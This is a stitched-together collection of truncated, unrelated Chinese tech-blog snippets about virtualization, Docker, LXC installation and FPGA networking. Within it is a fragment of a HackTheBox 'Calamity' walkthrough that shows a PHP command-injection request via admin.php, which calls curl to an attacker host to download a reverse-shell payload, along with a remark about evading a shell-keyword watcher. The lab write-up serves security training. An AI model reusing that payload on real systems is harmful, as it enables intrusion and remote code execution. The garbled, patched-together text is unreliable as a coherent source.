lxc

　　什么是虚拟化？虚拟化有哪些分类？每个学习Linux运维技术的人都需要了解云计算架构、虚拟化、docker容器，这些都是运维需要掌握的技能。随着Linux技术的飞速发展，越来越多的人在学习Linux云计算。那么docker的学习过程中什么是虚拟化呢？虚拟化有哪些分类？让我们一起看看。 　　什么是虚拟化？ 　　操作系统层虚拟化是指通过划分主机操作系统的特定部分来隔离生产操作执行环境。操作系统层的虚拟化是操作系统内核直接提供的虚拟化，虚拟化的操作系统共享底层主机操作系统内核和底层硬件资源。操作系统虚拟化的关键点是将操作系统与上层应用隔离，将对操作系统资源的访问进行虚报化，让上层应用感觉垄断了操作系统。 　　操作系统虚拟化的优势是实现虚拟操作系统和物理操作系统的隔离，有效避免物理操作系统的重复安装。众所周知的操作系统虚报化解决方案包括有Virtual Server、Zone、Virtuozzo及虚拟专用服务器（Vital PnvateSever，VPS）。VPS使用虚拟服务器软件在一台物理机上创建多个相互隔离的小服务器。这些小服务器都有自己的操作系统，运行和管理与独立主机完全不同。可以保证用户独占资源，节约成本。 　　虚拟化分类有哪些？ 　　1.仿真虚拟化[对系统硬件没有要求，性能最低]VMware 　　2.半虚拟化[虚拟机可以使用真机物理硬件，性能高，需要改内核]xen 　　3

docker是一个云计算平台，他利用了linux的lxc、AUFU、Go语言、cgroup实现了资源的独立，可以很轻松的实现文件、资源、网络等隔离，他最终的目标是想实现类似PAAS平台的应用隔离，据说将要开源，希望大家关注 Notable features Filesystem isolation: each process container runs in a completely separate root filesystem. Resource isolation: system resources like cpu and memory can be allocated differently to each process container, using cgroups. Network isolation: each process container runs in its own network namespace, with a virtual interface and IP address of its own. Copy-on-write: root filesystems are created using copy-on-write, which makes deployment extremeley fast, memory-cheap and

1.直接在终端输入docker会返回docker支持的所有命令和一些通用的参数，如下 Usage: docker [OPTIONS] COMMAND [arg...] docker [ --help | -v | -- version ] A self -sufficient runtime for containers. Options: --config=~/ .docker Location of client config files -D, -- debug Enable debug mode -H, --host= [] Daemon socket(s) to connect to -h, -- help Print usage -l, --log-level= info Set the logging level --tls Use TLS; implied by -- tlsverify --tlscacert=~/.docker/ca.pem Trust certs signed only by this CA --tlscert=~/.docker/ cert.pem Path to TLS certificate file --tlskey=~/.docker/ key.pem Path to TLS key file -- tlsverify Use TLS

最近又继续更新《FPGA和外围接口》，这次带来FPGA的网口通信方面的内容，之前的内容可以参考：https://github.com/suisuisi/FPGA/tree/FPGAandPI/FPGAandPI ，原相关文档也在。 这次更新的主要内容如上，前三节偏向理论范围内的分析，包括各种常见的术语解析，包括但不局限于TCP、UDP、PCS、PMA、MAC、MII、SGMII、RGMII等方面内容，其中部分内容会有功能重叠的部分，会着重讲解这部分内容的区别，例如同属于传输层的TCP、UDP协议，会重点讲解两者之间的区别，另外对于引导部分的OSI参考模型和TCP/IP模型，各种教科书和权威网站都有详细的介绍，所以不会过多的进行介绍，但是会用各种“不恰当”的例子进行解释，所以这部分内容如果不是特别感兴趣的，可以看一本非常经典的图书《[图解TCP/IP(第5版).乌尼日其其格》（下面会有链接），其中内容深入浅出，对于不太了解这个协议的人还是非常友善的；中间还会增加一章常见的RGMII千兆PHY的调试总结，最后会有两个应用例程。 今年还会增加PCIe方面的内容，敬请关注！ [图解TCP/IP(第5版).乌尼日其其格 链接: https://pan.baidu.com/s/1hZkt9kNo2qL3lXC7gQMKxQ 提取码: fnb8 PS：小文件已经找到百度WP和谐链接的方法了

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.27 本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描 执行命令 autorecon 10.10.10.27 -o ./calamity-autorecon 最终的扫描结果 得知开放两个端口，先访问80端口 没发现啥有价值的信息，看下上面程序跑的目录情况 发现200响应码 有最下面几个，访问了，确认admin.php看似是可以利用的 上面试了试admin/admin弱口令并未成功，然后看下burpsuite抓包情况 发现密码，使用此密码以用户admin进行登录 登录成功之后，显示上述信息，根据上述信息的提示可以是使用php进行命令执行，试了试还真可以 那么可以执行命令那么就反弹shell，这里开始使用nc，发现成功反弹之后又被踢出去了，后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致，所以我这直接使用curl命令下载php反弹shell然后执行成功反弹，下面是反弹shell请求包 GET /admin.php?html=%3C%3Fphp+system%28( ' curl+http://10.10.14.4

在学习docker 之前，我们先简单了解一下chroot 监狱限制，和lxc容器。 因为docker的本质使用了这两种技术： 1: chroot 监狱限制 2: lxc容器 容器技术的发展过程： 1）:chroot技术，新建一个子系统 参考资料：https://www.ibm.com/developerworks/cn/linux/l-cn-chroot/ chang root 2) : 使用chroot监狱限制SSH用户访问指定目录和使用指定命令 参考资料： https://linux.cn/article-8313-1.html linux容器(lxc) linux container 里面用到的两种技术： namespaces 网络命名空间 隔离环境 cgroups 资源限制) 下面我们安装一下lxc: #安装epel源 wget -O 随便安装清华的或者阿里的都行（最好和base源保持一样属于同一家源） ##安装lxc yum install lxc-* -y yum install libcgroup* -y yum install bridge-utils.x86_64 -y ##桥接网卡 [root@controller ~]# echo 'TYPE=Ethernet BOOTPROTO=none NAME=eth0 DEVICE=eth0 ONBOOT=yes

前面的文章给大家分享了「 Python web开发从入门到放弃 」其中提到了开发部署的事宜。由于有很多同学咨询， 为了让大家更好的理解，所以打算把容 器化部署作为一个系列来阐述，今天给大家简单讲下Docker入门使用，欢迎大家进行持续关注。 Docker是基于Go语言实现的开源容器项目，从2013年诞生就引起了业界广泛的关注，它是一种新的容器技术对比传统的LXC（Linux Container）技术。 Docker理念是实现「Build，Ship and Run Any App Anywhere」，达到类似JAVA「一次封装，处处运行」的目的。通过Docker我们可以为应用的开发，测试，部署，进行一站式处理。 作为现在云计算最火的技术，Docker拥有非常多的优点： 简单容易上手 解决运维环境和服务调度问题 低CPU内存资源占用 云计算核心技术 社区活跃 下面我们简单介绍一下Docker的安装使用 Docker安装 Docker目前只能运行在64位平台上，我记得当初团队两年前团队服务器用不了Docker估计就是这个原因。 安装我们可以手动安装或者脚本进行安装，这里我们使用脚本进行安装。 Ubuntu Linux安装： sudo curl -sSL https://get.docker.com | sh # 官方安装 sudo curl -sSL https://get